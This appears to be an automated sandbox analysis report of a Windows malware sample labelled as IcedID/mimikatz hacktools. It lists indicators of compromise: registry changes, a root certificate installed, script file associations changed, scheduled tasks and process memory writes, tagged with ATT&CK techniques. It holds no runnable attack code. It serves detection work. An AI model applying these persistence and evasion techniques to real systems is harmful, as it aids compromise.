Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cqkgbschn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ejrscct.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2320	PING.EXE
2004	cmd.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral1/files/0x0008000000016d29-5.dat	nsis_installer_2
behavioral1/files/0x0007000000016d64-17.dat	nsis_installer_1
behavioral1/files/0x0007000000016d64-17.dat	nsis_installer_2

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-8a-b1-ef-ad-25\WpadDetectedUrl	ejrscct.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F96E1D97-DC47-4966-8B8F-5D14438B4C15}	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F96E1D97-DC47-4966-8B8F-5D14438B4C15}\ee-8a-b1-ef-ad-25	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	ejrscct.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	ejrscct.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F96E1D97-DC47-4966-8B8F-5D14438B4C15}\WpadDecisionTime = e0d30141d15fdb01	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	nehbuguun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	nehbuguun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ejrscct.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00c9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	nehbuguun.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-8a-b1-ef-ad-25\WpadDecisionTime = e0d30141d15fdb01	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-8a-b1-ef-ad-25\WpadDecision = "0"	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump	nehbuguun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F96E1D97-DC47-4966-8B8F-5D14438B4C15}\WpadNetworkName = "Network 3"	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	nehbuguun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ejrscct.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F96E1D97-DC47-4966-8B8F-5D14438B4C15}\WpadDecisionReason = "1"	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	ejrscct.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	ejrscct.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-8a-b1-ef-ad-25\WpadDecisionReason = "1"	ejrscct.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ejrscct.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	ejrscct.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	ejrscct.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	ejrscct.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	ejrscct.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	ejrscct.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2320	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2324	schtasks.exe
2512	schtasks.exe
1524	schtasks.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

pid	Process
2684	ejrscct.exe
3132	ejrscct.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe

Suspicious behavior: LoadsDriver 31 IoCs

pid	Process
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found
476	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	2472	ejrscct.exe
Token: SeDebugPrivilege	2940	ejrscct.exe
Token: SeDebugPrivilege	2176	vfshost.exe
Token: SeAuditPrivilege	2692	svchost.exe
Token: SeDebugPrivilege	112	nehbuguun.exe
Token: SeShutdownPrivilege	112	nehbuguun.exe
Token: SeLockMemoryPrivilege	2056	dlgdbm.exe
Token: SeLockMemoryPrivilege	2056	dlgdbm.exe
Token: SeDebugPrivilege	2428	nehbuguun.exe
Token: SeShutdownPrivilege	2428	nehbuguun.exe
Token: SeDebugPrivilege	3004	nehbuguun.exe
Token: SeShutdownPrivilege	3004	nehbuguun.exe
Token: SeDebugPrivilege	2420	nehbuguun.exe
Token: SeShutdownPrivilege	2420	nehbuguun.exe
Token: SeDebugPrivilege	2752	nehbuguun.exe
Token: SeShutdownPrivilege	2752	nehbuguun.exe
Token: SeDebugPrivilege	1184	nehbuguun.exe
Token: SeShutdownPrivilege	1184	nehbuguun.exe
Token: SeDebugPrivilege	288	nehbuguun.exe
Token: SeShutdownPrivilege	288	nehbuguun.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
2472	ejrscct.exe
2472	ejrscct.exe
2940	ejrscct.exe
2940	ejrscct.exe
832	xohudmc.exe
1464	zmxrwm.exe
2684	ejrscct.exe
2684	ejrscct.exe
3132	ejrscct.exe
3132	ejrscct.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 592 wrote to memory of 2004	592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe	30
PID 592 wrote to memory of 2004	592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe	30
PID 592 wrote to memory of 2004	592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe	30
PID 592 wrote to memory of 2004	592	2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe	30
PID 2004 wrote to memory of 2320	2004	cmd.exe	32
PID 2004 wrote to memory of 2320	2004	cmd.exe	32
PID 2004 wrote to memory of 2320	2004	cmd.exe	32
PID 2004 wrote to memory of 2320	2004	cmd.exe	32
PID 2004 wrote to memory of 2472	2004	cmd.exe	33
PID 2004 wrote to memory of 2472	2004	cmd.exe	33
PID 2004 wrote to memory of 2472	2004	cmd.exe	33
PID 2004 wrote to memory of 2472	2004	cmd.exe	33
PID 2940 wrote to memory of 2848	2940	ejrscct.exe	36
PID 2940 wrote to memory of 2848	2940	ejrscct.exe	36
PID 2940 wrote to memory of 2848	2940	ejrscct.exe	36
PID 2940 wrote to memory of 2848	2940	ejrscct.exe	36
PID 2848 wrote to memory of 2696	2848	cmd.exe	38
PID 2848 wrote to memory of 2696	2848	cmd.exe	38
PID 2848 wrote to memory of 2696	2848	cmd.exe	38
PID 2848 wrote to memory of 2696	2848	cmd.exe	38
PID 2848 wrote to memory of 2880	2848	cmd.exe	39
PID 2848 wrote to memory of 2880	2848	cmd.exe	39
PID 2848 wrote to memory of 2880	2848	cmd.exe	39
PID 2848 wrote to memory of 2880	2848	cmd.exe	39
PID 2848 wrote to memory of 2780	2848	cmd.exe	40
PID 2848 wrote to memory of 2780	2848	cmd.exe	40
PID 2848 wrote to memory of 2780	2848	cmd.exe	40
PID 2848 wrote to memory of 2780	2848	cmd.exe	40
PID 2848 wrote to memory of 2420	2848	cmd.exe	41
PID 2848 wrote to memory of 2420	2848	cmd.exe	41
PID 2848 wrote to memory of 2420	2848	cmd.exe	41
PID 2848 wrote to memory of 2420	2848	cmd.exe	41
PID 2848 wrote to memory of 3012	2848	cmd.exe	42
PID 2848 wrote to memory of 3012	2848	cmd.exe	42
PID 2848 wrote to memory of 3012	2848	cmd.exe	42
PID 2848 wrote to memory of 3012	2848	cmd.exe	42
PID 2848 wrote to memory of 2708	2848	cmd.exe	43
PID 2848 wrote to memory of 2708	2848	cmd.exe	43
PID 2848 wrote to memory of 2708	2848	cmd.exe	43
PID 2848 wrote to memory of 2708	2848	cmd.exe	43
PID 2940 wrote to memory of 2616	2940	ejrscct.exe	44
PID 2940 wrote to memory of 2616	2940	ejrscct.exe	44
PID 2940 wrote to memory of 2616	2940	ejrscct.exe	44
PID 2940 wrote to memory of 2616	2940	ejrscct.exe	44
PID 2940 wrote to memory of 2604	2940	ejrscct.exe	46
PID 2940 wrote to memory of 2604	2940	ejrscct.exe	46
PID 2940 wrote to memory of 2604	2940	ejrscct.exe	46
PID 2940 wrote to memory of 2604	2940	ejrscct.exe	46
PID 2940 wrote to memory of 2168	2940	ejrscct.exe	48
PID 2940 wrote to memory of 2168	2940	ejrscct.exe	48
